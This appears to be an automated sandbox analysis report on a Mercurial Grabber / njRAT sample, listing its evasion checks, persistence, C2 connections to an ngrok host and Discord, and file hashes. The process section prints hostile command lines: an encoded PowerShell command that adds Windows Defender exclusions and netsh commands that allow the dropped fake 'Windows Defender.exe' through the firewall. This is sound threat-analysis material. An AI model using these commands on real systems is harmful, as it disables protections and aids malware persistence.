Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\output.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\output.exe
"C:\Users\Admin\AppData\Local\Temp\output.exe"
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\mode.com
mode 80,15
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\mode.com
mode 130,30
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4988 -ip 4988
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4988 -s 2036
Network
| Country | Destination | Domain | Proto |
| US | 74.125.34.46:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 93.184.220.29:80 | tcp | |
| US | 20.189.173.1:443 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
Files
memory/4500-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/4988-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/4988-140-0x0000000000FC0000-0x0000000000FD0000-memory.dmp
memory/2268-139-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
memory/832-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
| MD5 | 4b4e566a986fe97ba2d89f9c64a24c64 |
| SHA1 | 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea |
| SHA256 | 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97 |
| SHA512 | 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8 |
memory/4004-145-0x0000000000000000-mapping.dmp
memory/3668-146-0x0000000000000000-mapping.dmp
memory/4500-147-0x0000000002920000-0x0000000002956000-memory.dmp
memory/4500-148-0x00000000051D0000-0x00000000057F8000-memory.dmp
memory/4988-149-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/2268-150-0x0000000073B70000-0x0000000074121000-memory.dmp
memory/4452-151-0x0000000000000000-mapping.dmp
memory/4500-152-0x0000000004F70000-0x0000000004F92000-memory.dmp
memory/4500-154-0x00000000058E0000-0x0000000005946000-memory.dmp
memory/4500-153-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/4500-155-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/2732-156-0x0000000000000000-mapping.dmp
memory/4988-157-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/2268-158-0x0000000073B70000-0x0000000074121000-memory.dmp
memory/4276-159-0x0000000000000000-mapping.dmp
memory/1920-160-0x0000000000000000-mapping.dmp
memory/3068-161-0x0000000000000000-mapping.dmp
memory/4580-162-0x0000000000000000-mapping.dmp
memory/1276-163-0x0000000000000000-mapping.dmp
memory/4852-165-0x0000000000000000-mapping.dmp
memory/3184-164-0x0000000000000000-mapping.dmp
memory/4500-166-0x0000000006EE0000-0x0000000006F12000-memory.dmp
memory/4500-167-0x00000000746C0000-0x000000007470C000-memory.dmp
memory/4500-168-0x00000000064C0000-0x00000000064DE000-memory.dmp
memory/4500-169-0x0000000007860000-0x0000000007EDA000-memory.dmp
memory/4500-170-0x0000000007220000-0x000000000723A000-memory.dmp
memory/4500-171-0x0000000007290000-0x000000000729A000-memory.dmp
memory/4500-172-0x00000000074B0000-0x0000000007546000-memory.dmp
memory/4988-173-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/4500-174-0x0000000007590000-0x000000000759E000-memory.dmp
memory/4500-175-0x00000000075E0000-0x00000000075FA000-memory.dmp
memory/4500-176-0x00000000075D0000-0x00000000075D8000-memory.dmp